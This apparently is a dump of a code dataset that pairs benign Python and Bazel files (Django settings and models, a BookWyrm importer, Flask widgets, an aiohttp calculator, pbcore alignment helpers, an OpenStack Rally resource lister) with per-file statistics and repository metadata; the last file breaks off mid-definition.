},
},
]
WSGI_APPLICATION = 'CC_ERP.wsgi.application'
# custom usermodel
AUTH_USER_MODEL = 'frontpage.User'
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = "fr-fr"
TIME_ZONE = "Europe/Paris"
USE_I18N = True
USE_L10N = True
USE_TZ = True
STATIC_ROOT = os.path.join(BASE_DIR, "staticfiles")
STATIC_URL = '/static/'
STATICFILES_DIR = {
os.path.join(BASE_DIR, "static"),
}
# serving media files through google storage
DEFAULT_FILE_STORAGE = 'storages.backends.gcloud.GoogleCloudStorage'
GS_BUCKET_NAME = "child-care-erp"
GS_PROJECT_ID = "p11oc-283117"
MEDIA_URL = 'https://storage.cloud.google.com/{}/'.format(GS_BUCKET_NAME)
MEDIA_ROOT = "media/"
try:
with open("app/google-credentials.json") as f:
pass
GS_CREDENTIALS = service_account.Credentials.from_service_account_file(
os.environ.get("GOOGLE_APPLICATION_CREDENTIALS")
)
except FileNotFoundError:
GS_CREDENTIALS = None
# debug toolbar specific setting
INTERNAL_IPS = ["127.0.0.1"]
# app custom settings
LOGIN_REDIRECT_URL = "/auth/index/"
STRUCTURE = os.environ.get("STRUCTURE")
ACTIVITIES_CHOICES = [
("MF", "Motricité Fine"),
("M", "Motricité"),
("SP", "Sport")
]
# security settings to prevent sesison cookies
# and csrf token to leak while http only
CSRF_COOKIE_SECURE = True
SESSION_COOKIE_SECURE = True
# Heroku deployment helper (set secret key, whitenoise,
# DB... with env.variables specs.)
django_heroku.settings(locals(), allowed_hosts=False)
| 27.676136 | 91 | 0.724081 | 582 | 4,871 | 5.898625 | 0.427835 | 0.060588 | 0.039616 | 0.036411 | 0.136615 | 0.100204 | 0.054763 | 0.054763 | 0.023303 | 0 | 0 | 0.010922 | 0.154178 | 4,871 | 175 | 92 | 27.834286 | 0.82233 | 0.246151 | 0 | 0 | 1 | 0 | 0.450178 | 0.340379 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.06422 | 0.055046 | 0 | 0.055046 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
7395e2f7b730555819cd20214bca377a1d762cca | 892 | py | Python | bookwyrm/importers/calibre_import.py | mouse-reeve/fedireads | e3471fcc3500747a1b1deaaca662021aae5b08d4 | [
"CC0-1.0"
] | 270 | 2020-01-27T06:06:07.000Z | 2020-06-21T00:28:18.000Z | bookwyrm/importers/calibre_import.py | mouse-reeve/fedireads | e3471fcc3500747a1b1deaaca662021aae5b08d4 | [
"CC0-1.0"
] | 158 | 2020-02-10T20:36:54.000Z | 2020-06-26T17:12:54.000Z | bookwyrm/importers/calibre_import.py | mouse-reeve/fedireads | e3471fcc3500747a1b1deaaca662021aae5b08d4 | [
"CC0-1.0"
] | 15 | 2020-02-13T21:53:33.000Z | 2020-06-17T16:52:46.000Z | """ handle reading a csv from calibre """
from bookwyrm.models import Shelf
from . import Importer
class CalibreImporter(Importer):
"""csv downloads from Calibre"""
service = "Calibre"
def __init__(self, *args, **kwargs):
# Add timestamp to row_mappings_guesses for date_added to avoid
# integrity error
row_mappings_guesses = []
for field, mapping in self.row_mappings_guesses:
if field in ("date_added",):
row_mappings_guesses.append((field, mapping + ["timestamp"]))
else:
row_mappings_guesses.append((field, mapping))
self.row_mappings_guesses = row_mappings_guesses
super().__init__(*args, **kwargs)
def get_shelf(self, normalized_row):
# Calibre export does not indicate which shelf to use. Go with a default one for now
return Shelf.TO_READ
| 30.758621 | 92 | 0.653587 | 108 | 892 | 5.148148 | 0.5 | 0.138489 | 0.226619 | 0.07554 | 0.129496 | 0.129496 | 0 | 0 | 0 | 0 | 0 | 0 | 0.258969 | 892 | 28 | 93 | 31.857143 | 0.84115 | 0.25 | 0 | 0 | 0 | 0 | 0.039695 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0.2 | 0.066667 | 0.533333 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
73a09d032092ab2c9601de37cc36a19d7eec74a9 | 3,366 | py | Python | app/widgets.py | sintax1/beaconlp | 2cf42d0da445d2d1edf08b06e8da9140ff10f307 | [
"MIT"
] | null | null | null | app/widgets.py | sintax1/beaconlp | 2cf42d0da445d2d1edf08b06e8da9140ff10f307 | [
"MIT"
] | 4 | 2016-02-26T22:34:44.000Z | 2016-03-01T03:37:25.000Z | app/widgets.py | sintax1/beaconlp | 2cf42d0da445d2d1edf08b06e8da9140ff10f307 | [
"MIT"
] | null | null | null | from flask.globals import _request_ctx_stack
import json
class FilterBuilderWidget(object):
"""
Filter Builder Form Widget
"""
template = '/widgets/filterbuilder.html'
template_args = None
beacon_filters = []
beacon_fields = []
def __init__(self, **kwargs):
if 'beacon_filters' not in kwargs:
kwargs['beacon_filters'] = self.beacon_filters
if 'beacon_fields' not in kwargs:
kwargs['beacon_fields'] = self.beacon_fields
self.template_args = kwargs
def __call__(self, field, **kwargs):
kwargs.setdefault('id', field.id)
kwargs.setdefault('name', field.name)
if field.data:
kwargs['filter_rules'] = "rules: %s" % field.data
ctx = _request_ctx_stack.top
jinja_env = ctx.app.jinja_env
template = jinja_env.get_template(self.template)
args = self.template_args.copy()
args.update(kwargs)
return template.render(args)
class BeaconFieldsWidget(object):
"""
Beacon Fields Form Widget
"""
template = '/widgets/beaconfields.html'
template_args = None
beacon_fields = []
packet_fields = []
data_mapping = (
('Raw.load', 'type'),
('Raw.load', 'uuid'),
('Raw.load', 'data_length'),
('Raw.load', 'data'),
)
def __init__(self, **kwargs):
if 'beacon_fields' not in kwargs:
kwargs['beacon_fields'] = self.beacon_fields
if 'packet_fields' not in kwargs:
kwargs['packet_fields'] = self.packet_fields
if 'data_mapping' not in kwargs:
kwargs['data_mapping'] = self.data_mapping
self.template_args = kwargs
def __call__(self, field, **kwargs):
kwargs.setdefault('id', field.id)
kwargs.setdefault('name', field.name)
kwargs.setdefault('data_mapping', self.data_mapping)
if field.data:
kwargs['data_mapping'] = json.loads(field.data)
ctx = _request_ctx_stack.top
jinja_env = ctx.app.jinja_env
template = jinja_env.get_template(self.template)
args = self.template_args.copy()
args.update(kwargs)
return template.render(args)
class ResponseFieldsWidget(object):
"""
Form widget for message response format
"""
template = '/widgets/responsefields.html'
template_args = None
packet_fields = []
response_fields = []
data_mapping = (
('Raw.load', 'type'),
('Raw.load', 'data_length'),
('Raw.load', 'data')
)
def __init__(self, **kwargs):
if 'response_fields' not in kwargs:
kwargs['response_fields'] = self.response_fields
if 'packet_fields' not in kwargs:
kwargs['packet_fields'] = self.packet_fields
if 'data_mapping' not in kwargs:
kwargs['data_mapping'] = self.data_mapping
self.template_args = kwargs
def __call__(self, field, **kwargs):
kwargs.setdefault('id', field.id)
kwargs.setdefault('name', field.name)
kwargs.setdefault('data_mapping', self.data_mapping)
ctx = _request_ctx_stack.top
jinja_env = ctx.app.jinja_env
template = jinja_env.get_template(self.template)
args = self.template_args.copy()
args.update(kwargs)
return template.render(args)
| 28.05 | 61 | 0.616162 | 381 | 3,366 | 5.188976 | 0.167979 | 0.072332 | 0.072838 | 0.068791 | 0.746586 | 0.697016 | 0.68437 | 0.68437 | 0.652504 | 0.652504 | 0 | 0 | 0.266488 | 3,366 | 119 | 62 | 28.285714 | 0.800729 | 0.027332 | 0 | 0.746988 | 0 | 0 | 0.143831 | 0.025108 | 0 | 0 | 0 | 0 | 0 | 1 | 0.072289 | false | 0 | 0.024096 | 0 | 0.337349 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
73a5419fd10b78f7c83c2071f2e423d27e6ab0b9 | 654 | py | Python | chapter08/packt-calc/packt_calc/calc.py | PacktPublishing/Migrating-from-Python-2-to-Python-3 | 1cb70b7fce12fe11bc2a25a86cbe3281d544f81d | [
"MIT"
] | null | null | null | chapter08/packt-calc/packt_calc/calc.py | PacktPublishing/Migrating-from-Python-2-to-Python-3 | 1cb70b7fce12fe11bc2a25a86cbe3281d544f81d | [
"MIT"
] | null | null | null | chapter08/packt-calc/packt_calc/calc.py | PacktPublishing/Migrating-from-Python-2-to-Python-3 | 1cb70b7fce12fe11bc2a25a86cbe3281d544f81d | [
"MIT"
] | null | null | null | from aiohttp import web
def add(op1, op2):
return op1 + op2
def sub(op1, op2):
return op1 - op2
async def add_handler(request):
result = add(int(request.match_info['op1']) ,
int(request.match_info['op2']))
return web.Response(text="{}".format(result))
async def sub_handler(request):
result = sub(int(request.match_info['op1']),
int(request.match_info['op2']))
return web.Response(text="{}".format(result))
def start_server():
app = web.Application()
app.add_routes([web.get('/add/{op1}/{op2}', add)])
app.add_routes([web.get('/sub/{op1}/{op2}', sub)])
web.run_app(app)
| 22.551724 | 54 | 0.616208 | 92 | 654 | 4.271739 | 0.293478 | 0.091603 | 0.152672 | 0.193384 | 0.575064 | 0.391858 | 0.391858 | 0.391858 | 0.391858 | 0.391858 | 0 | 0.030593 | 0.200306 | 654 | 28 | 55 | 23.357143 | 0.720841 | 0 | 0 | 0.222222 | 0 | 0 | 0.073395 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.055556 | 0.111111 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
73ab35bc8a4538528d0ef6dc229df5b1c965c9fb | 5,931 | py | Python | pbcore/io/align/_AlignmentMixin.py | yoshihikosuzuki/pbcore | 956c45dea8868b5cf7d9b8e9ce98ac8fe8a60150 | [
"BSD-3-Clause"
] | null | null | null | pbcore/io/align/_AlignmentMixin.py | yoshihikosuzuki/pbcore | 956c45dea8868b5cf7d9b8e9ce98ac8fe8a60150 | [
"BSD-3-Clause"
] | null | null | null | pbcore/io/align/_AlignmentMixin.py | yoshihikosuzuki/pbcore | 956c45dea8868b5cf7d9b8e9ce98ac8fe8a60150 | [
"BSD-3-Clause"
] | null | null | null | # Author: David Alexander
__all__ = [ "AlignmentReaderMixin",
"AlignmentRecordMixin",
"IndexedAlignmentReaderMixin" ]
from pbcore.io import BasH5Collection
import numpy as np
class AlignmentReaderMixin(object):
"""
Mixin class for higher-level functionality of alignment file
readers.
"""
def attach(self, fofnFilename):
"""
Attach the actual movie data files that were used to create this
alignment file.
"""
self.basH5Collection = BasH5Collection(fofnFilename)
@property
def moviesAttached(self):
return (hasattr(self, "basH5Collection") and self.basH5Collection is not None)
class IndexedAlignmentReaderMixin(AlignmentReaderMixin):
"""
Mixin class for alignment readers that have access to an alignment
index.
"""
def readsByName(self, query):
"""
Identifies reads by name query. The name query is interpreted as follows:
- "movieName/holeNumber[/[*]]" => gets all records from a chosen movie, ZMW
- "movieName/holeNumber/rStart_rEnd => gets all records *overlapping* read range query in movie, ZMW
- "movieName/holeNumber/ccs" => gets CCS records from chose movie, ZMW (zero or one)
Records are returned in a list in ascending order of rStart
"""
def rgIDs(movieName):
return self.readGroupTable.ID[self.readGroupTable.MovieName == movieName]
#return self.movieInfoTable.ID[self.movieInfoTable.Name == movieName]
def rangeOverlap(w1, w2):
s1, e1 = w1
s2, e2 = w2
return (e1 > s2) and (e2 > s1)
def rQueryMatch(readName, rQuery):
if rQuery == "*" or rQuery == "":
return True
elif rQuery == "ccs":
return readName.endswith("ccs")
elif readName.endswith("ccs"):
return False
else:
q = list(map(int, rQuery.split("_")))
r = list(map(int, readName.split("/")[-1].split("_")))
return rangeOverlap(q, r)
fields = query.split("/")
movieName = fields[0]
holeNumber = int(fields[1])
if len(fields) > 2: rQuery = fields[2]
else: rQuery = "*"
rgs = rgIDs(movieName)
rns = np.flatnonzero(np.in1d(self.qId, rgs) &
(self.holeNumber == holeNumber))
alns = [ a for a in self[rns]
if rQueryMatch(a.readName, rQuery) ]
return sorted(alns, key=lambda a: a.readStart)
def readsByHoleNumber(self, hn):
"""
Identify reads by hole number, for single-movie alignment files.
Raises a ValueError for alignment files that are not single-movie
"""
movieNames = list(self.movieNames)
if len(movieNames) != 1:
raise ValueError("readsByHoleNumber expects a single-movie file")
else:
return self.readsByName(movieNames[0] + "/" + str(hn))
class AlignmentRecordMixin(object):
"""
Mixin class providing some higher-level functionality for
alignment records.
"""
@property
def zmw(self):
if not self.reader.moviesAttached:
raise ValueError("Movies not attached!")
return self.reader.basH5Collection[self.zmwName]
@property
def zmwRead(self):
if not self.reader.moviesAttached:
raise ValueError("Movies not attached!")
return self.reader.basH5Collection[self.readName]
@property
def referenceStart(self):
"""
The left bound of the alignment, in reference coordinates.
"""
return self.tStart
@property
def referenceEnd(self):
"""
The right bound of the alignment, in reference coordinates.
"""
return self.tEnd
@property
def readStart(self):
"""
The left bound of the alignment, in read coordinates (from the BAS.H5 file).
"""
return self.aStart
@property
def readEnd(self):
"""
The right bound of the alignment, in read coordinates (from the BAS.H5 file).
"""
return self.aEnd
@property
def referenceSpan(self):
"""
The length along the reference implied by this alignment.
"""
return self.tEnd - self.tStart
@property
def readLength(self):
"""
The length of the read.
"""
return self.aEnd - self.aStart
def __len__(self):
return self.readLength
@property
def readName(self):
"""
Return the name of the read that was aligned, in standard
PacBio format.
"""
zmwName = self.zmwName
if self.readType == "CCS":
return "%s/ccs" % (zmwName,)
else:
return "%s/%d_%d" % (zmwName, self.aStart, self.aEnd)
@property
def zmwName(self):
return "%s/%d" % (self.movieName, self.HoleNumber)
def spansReferencePosition(self, pos):
"""
Does the alignment span the given reference position?
"""
return self.tStart <= pos < self.tEnd
def spansReferenceRange(self, start, end):
"""
Does the alignment span the given reference range, in its entirety?
"""
assert start <= end
return (self.tStart <= start <= end <= self.tEnd)
def overlapsReferenceRange(self, start, end):
"""
Does the alignment overlap the given reference interval?
"""
assert start <= end
return (self.tStart < end) and (self.tEnd > start)
def containedInReferenceRange(self, start, end):
"""
Is the alignment wholly contained within a given reference interval?
"""
assert start <= end
return (start <= self.tStart <= self.tEnd <= end)
| 30.260204 | 109 | 0.585399 | 630 | 5,931 | 5.492063 | 0.3 | 0.043353 | 0.011561 | 0.021965 | 0.205202 | 0.205202 | 0.182081 | 0.136416 | 0.123121 | 0.093642 | 0 | 0.007148 | 0.315967 | 5,931 | 195 | 110 | 30.415385 | 0.845699 | 0.272635 | 0 | 0.212121 | 0 | 0 | 0.052876 | 0.006964 | 0 | 0 | 0 | 0 | 0.030303 | 1 | 0.222222 | false | 0 | 0.020202 | 0.040404 | 0.525253 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
73ac4b419ad1dd8d0129acbe189ae556749ed578 | 798 | bzl | Python | third_party/bazel/blade_service_common/blade_service_common_configure.bzl | JamesTheZ/BladeDISC | e6c76ee557ebfccd560d44f6b6276bbc4e0a8a34 | [
"Apache-2.0"
] | null | null | null | third_party/bazel/blade_service_common/blade_service_common_configure.bzl | JamesTheZ/BladeDISC | e6c76ee557ebfccd560d44f6b6276bbc4e0a8a34 | [
"Apache-2.0"
] | null | null | null | third_party/bazel/blade_service_common/blade_service_common_configure.bzl | JamesTheZ/BladeDISC | e6c76ee557ebfccd560d44f6b6276bbc4e0a8a34 | [
"Apache-2.0"
] | null | null | null | load("//bazel:common.bzl", "get_env_bool_value")
_IS_PLATFORM_ALIBABA = "IS_PLATFORM_ALIBABA"
def _blade_service_common_impl(repository_ctx):
if get_env_bool_value(repository_ctx, _IS_PLATFORM_ALIBABA):
repository_ctx.template("blade_service_common_workspace.bzl", Label("//bazel/blade_service_common:blade_service_common_workspace.bzl.tpl"), {
})
else:
repository_ctx.template("blade_service_common_workspace.bzl", Label("//bazel/blade_service_common:blade_service_common_empty_workspace.bzl.tpl"), {
})
repository_ctx.template("BUILD", Label("//bazel/blade_service_common:BUILD.tpl"), {
})
blade_service_common_configure = repository_rule(
implementation = _blade_service_common_impl,
environ = [
_IS_PLATFORM_ALIBABA,
],
)
| 36.272727 | 155 | 0.753133 | 97 | 798 | 5.649485 | 0.298969 | 0.218978 | 0.328467 | 0.14781 | 0.427007 | 0.354015 | 0.354015 | 0.354015 | 0.354015 | 0.354015 | 0 | 0 | 0.134085 | 798 | 21 | 156 | 38 | 0.793054 | 0 | 0 | 0.176471 | 0 | 0 | 0.383459 | 0.308271 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0 | 0 | 0.058824 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
73b7f931ff799d8b824909a4699456882d2f455f | 791 | py | Python | project/explore_anonymize_caida.py | ylavinia/pulearning632 | b4ed5e721aee85c9aa8375bf817e64237f6b298d | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null | project/explore_anonymize_caida.py | ylavinia/pulearning632 | b4ed5e721aee85c9aa8375bf817e64237f6b298d | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null | project/explore_anonymize_caida.py | ylavinia/pulearning632 | b4ed5e721aee85c9aa8375bf817e64237f6b298d | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null | """
Explore datasets and anonymize datasets
Input: original datasets
Output: anonymized datasets
"""
import os, sys, glob
import matplotlib.pyplot as plt
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import precision_recall_fscore_support
from pathlib import Path
from src.utils import get_proj_root
import pandas as pd
import numpy as np
import warnings
warnings.filterwarnings("ignore")
random_seed = 222
# anonymize datasets
print(" Anonymize datasets ... ")
def get_prefix_number(num):
"""
Getting the prefix for the new name
e.g, '0' for 12 so it becomes '012'
"""
prefix = '0'
if num < 10:
prefix = '00'
elif num >= 100:
prefix = ''
else:
prefix = '0'
return prefix
| 15.211538 | 59 | 0.678887 | 102 | 791 | 5.186275 | 0.656863 | 0.096408 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0301 | 0.243995 | 791 | 51 | 60 | 15.509804 | 0.854515 | 0.233881 | 0 | 0.095238 | 0 | 0 | 0.07231 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047619 | false | 0 | 0.428571 | 0 | 0.52381 | 0.047619 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
73c1459c73a94784db29a01857c43fe58358b046 | 2,201 | py | Python | dataview/models.py | gloryvictory/udata | 1d58e68add7b2f26127360dddbeeb7d24eb6606c | [
"MIT"
] | null | null | null | dataview/models.py | gloryvictory/udata | 1d58e68add7b2f26127360dddbeeb7d24eb6606c | [
"MIT"
] | 6 | 2020-06-05T20:18:38.000Z | 2021-06-04T22:12:17.000Z | dataview/models.py | gloryvictory/udata | 1d58e68add7b2f26127360dddbeeb7d24eb6606c | [
"MIT"
] | null | null | null | from django.db import models
from django.utils import timezone
from django.contrib.auth.models import User
class UserData(models.Model):
compname = models.CharField(max_length=250) # ZAHARENKOVAAA
disk = models.CharField(max_length=2) # E
folder = models.CharField(max_length=250) # inst\CorelDRAW.Graphics.Suite X7.17.4.0.887.Special.Edition.RePack.by.ALEX\OpenSource\CorelPS2PDF\
is_profile = models.BooleanField() # True if c:\Users etc...
filename_long = models.CharField(max_length=250) # CorelPS2PDF.vcxproj.filters
filename_shot = models.CharField(max_length=250) # CorelPS2PDF
ext_long = models.CharField(max_length=250) # vcxproj.filters
ext_shot = models.CharField(max_length=250) # filters
size = models.BigIntegerField() # 1323
fullname = models.TextField() # E:\inst\CorelDRAW.Graphics.Suite X7.17.4.0.887.Special.Edition.RePack.by.ALEX\OpenSource\CorelPS2PDF\CorelPS2PDF.vcxproj.filters
year = models.IntegerField() # 2019
month = models.IntegerField() # 8
creationtime = models.DateTimeField(auto_now_add=True) # 27.08.2019 16:46:53
fio = models.CharField(max_length=250) # Захаренкова Илона Давыдовна
otdel = models.CharField(max_length=250) # Издательский
textfull = models.TextField() # inst CorelDRAW Graphics Suite X7 17 4 0 887 Special Edition RePack by ALEX OpenSource CorelPS2PDF CorelPS2PDF vcxproj filters
textless = models.TextField() #
lastupdate = models.DateTimeField(auto_now_add=True)
#slug = models.SlugField(max_length=250, unique_for_date='publish')
#publish = models.DateTimeField(default=timezone.now)
#author = models.ForeignKey(User, related_name='blog_posts')
class Meta:
indexes = [
models.Index(fields=['compname', 'folder','fullname',]),
]
def __str__(self):
return self.title | 56.435897 | 194 | 0.619718 | 236 | 2,201 | 5.665254 | 0.440678 | 0.067315 | 0.121167 | 0.161556 | 0.460733 | 0.379955 | 0.221391 | 0.221391 | 0.221391 | 0.221391 | 0 | 0.052263 | 0.287142 | 2,201 | 39 | 195 | 56.435897 | 0.799873 | 0.323489 | 0 | 0 | 0 | 0 | 0.014976 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035714 | false | 0 | 0.107143 | 0.035714 | 0.928571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
73c5be926dc028a29a7817b90743d985c14a4743 | 12,013 | py | Python | tests/ci/osresources.py | varuntiwari27/rally | 948fba0e8fe8214dd3716451d2a52e014a4115be | [
"Apache-2.0"
] | null | null | null | tests/ci/osresources.py | varuntiwari27/rally | 948fba0e8fe8214dd3716451d2a52e014a4115be | [
"Apache-2.0"
] | null | null | null | tests/ci/osresources.py | varuntiwari27/rally | 948fba0e8fe8214dd3716451d2a52e014a4115be | [
"Apache-2.0"
] | null | null | null | # All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""List and compare most used OpenStack cloud resources."""
import argparse
import json
import subprocess
import sys
from rally.cli import cliutils
from rally.common import objects
from rally.common.plugin import discover
from rally import consts
from rally import osclients
class ResourceManager(object):
REQUIRED_SERVICE = None
REPR_KEYS = ("id", "name", "tenant_id", "zone", "zoneName", "pool")
def __init__(self, clients):
self.clients = clients
def is_available(self):
if self.REQUIRED_SERVICE:
return self.REQUIRED_SERVICE in self.clients.services().values()
return True
@property
def client(self):
return getattr(self.clients, self.__class__.__name__.lower())()
def get_resources(self):
all_resources = []
cls = self.__class__.__name__.lower()
for prop in dir(self):
if not prop.startswith("list_"):
continue
f = getattr(self, prop)
resources = f() or []
resource_name = prop[5:][:-1]
for res in resources:
# NOTE(stpierre): It'd be nice if we could make this a
# dict, but then we get ordering issues. So a list of
# 2-tuples it must be.
res_repr = []
for key in self.REPR_KEYS + (resource_name,):
if isinstance(res, dict):
value = res.get(key)
else:
value = getattr(res, key, None)
if value:
res_repr.append((key, value))
if not res_repr:
raise ValueError("Failed to represent resource %r" % res)
res_repr.extend([("class", cls),
("resource_name", resource_name)])
all_resources.append(res_repr)
return all_resources
class Keystone(ResourceManager):
REQUIRED_SERVICE = consts.Service.KEYSTONE
def list_users(self):
return self.client.users.list()
def list_tenants(self):
if hasattr(self.client, "projects"):
return self.client.projects.list() # V3
return self.client.tenants.list() # V2
def list_roles(self):
return self.client.roles.list()
class Nova(ResourceManager):
REQUIRED_SERVICE = consts.Service.NOVA
def list_flavors(self):
return self.client.flavors.list()
def list_floating_ip_pools(self):
return self.client.floating_ip_pools.list()
def list_floating_ips(self):
return self.client.floating_ips.list()
def list_images(self):
return self.client.images.list()
def list_keypairs(self):
return self.client.keypairs.list()
def list_networks(self):
return self.client.networks.list()
def list_security_groups(self):
return self.client.security_groups.list(
search_opts={"all_tenants": True})
def list_servers(self):
return self.client.servers.list(
search_opts={"all_tenants": True})
def list_services(self):
return self.client.services.list()
def list_availability_zones(self):
return self.client.availability_zones.list()
class Neutron(ResourceManager):
REQUIRED_SERVICE = consts.Service.NEUTRON
def has_extension(self, name):
extensions = self.client.list_extensions().get("extensions", [])
return any(ext.get("alias") == name for ext in extensions)
def list_networks(self):
return self.client.list_networks()["networks"]
def list_subnets(self):
return self.client.list_subnets()["subnets"]
def list_routers(self):
return self.client.list_routers()["routers"]
def list_ports(self):
return self.client.list_ports()["ports"]
def list_floatingips(self):
return self.client.list_floatingips()["floatingips"]
def list_security_groups(self):
return self.client.list_security_groups()["security_groups"]
def list_health_monitors(self):
if self.has_extension("lbaas"):
return self.client.list_health_monitors()["health_monitors"]
def list_pools(self):
if self.has_extension("lbaas"):
return self.client.list_pools()["pools"]
def list_vips(self):
if self.has_extension("lbaas"):
return self.client.list_vips()["vips"]
class Glance(ResourceManager):
REQUIRED_SERVICE = consts.Service.GLANCE
def list_images(self):
return self.client.images.list()
class Heat(ResourceManager):
REQUIRED_SERVICE = consts.Service.HEAT
def list_resource_types(self):
return self.client.resource_types.list()
def list_stacks(self):
return self.client.stacks.list()
class Cinder(ResourceManager):
REQUIRED_SERVICE = consts.Service.CINDER
def list_availability_zones(self):
return self.client.availability_zones.list()
def list_backups(self):
return self.client.backups.list()
def list_volume_snapshots(self):
return self.client.volume_snapshots.list()
def list_volume_types(self):
return self.client.volume_types.list()
def list_volumes(self):
return self.client.volumes.list(
search_opts={"all_tenants": True})
class Senlin(ResourceManager):
REQUIRED_SERVICE = consts.Service.SENLIN
def list_clusters(self):
return self.client.clusters()
def list_profiles(self):
return self.client.profiles()
class Watcher(ResourceManager):
REQUIRED_SERVICE = consts.Service.WATCHER
REPR_KEYS = ("uuid", "name")
def list_audits(self):
return self.client.audit.list()
def list_audit_templates(self):
return self.client.audit_template.list()
def list_goals(self):
return self.client.goal.list()
def list_strategies(self):
return self.client.strategy.list()
def list_action_plans(self):
return self.client.action_plan.list()
class CloudResources(object):
"""List and compare cloud resources.
resources = CloudResources(auth_url=..., ...)
saved_list = resources.list()
# Do something with the cloud ...
changes = resources.compare(saved_list)
has_changed = any(changes)
removed, added = changes
"""
def __init__(self, **kwargs):
self.clients = osclients.Clients(objects.Credential(**kwargs))
def _deduplicate(self, lst):
"""Change list duplicates to make all items unique.
>>> resources._deduplicate(["a", "b", "c", "b", "b"])
>>> ['a', 'b', 'c', 'b (duplicate 1)', 'b (duplicate 2)'
"""
deduplicated_list = []
for value in lst:
if value in deduplicated_list:
ctr = 0
try_value = value
while try_value in deduplicated_list:
ctr += 1
try_value = "%s (duplicate %i)" % (value, ctr)
value = try_value
deduplicated_list.append(value)
return deduplicated_list
def list(self):
managers_classes = discover.itersubclasses(ResourceManager)
resources = []
for cls in managers_classes:
manager = cls(self.clients)
if manager.is_available():
resources.extend(manager.get_resources())
return sorted(self._deduplicate(resources))
def compare(self, with_list):
# NOTE(stpierre): Each resource is either a list of 2-tuples,
# or a list of lists. (JSON doesn't honor tuples, so when we
# load data from JSON our tuples get turned into lists.) It's
# easiest to do the comparison with sets, so we need to change
# it to a tuple of tuples so that it's hashable.
saved_resources = set(tuple(tuple(d) for d in r) for r in with_list)
current_resources = set(tuple(tuple(d) for d in r)
for r in self.list())
removed = saved_resources - current_resources
added = current_resources - saved_resources
return (sorted(removed), sorted(added))
def _print_tabular_resources(resources, table_label):
cliutils.print_list(
objs=[dict(r) for r in resources],
fields=("class", "resource_name", "identifiers"),
field_labels=("service", "resource type", "identifiers"),
table_label=table_label,
formatters={"identifiers":
lambda d: " ".join("%s:%s" % (k, v)
for k, v in d.items()
if k not in ("class", "resource_name"))}
)
print("")
def main():
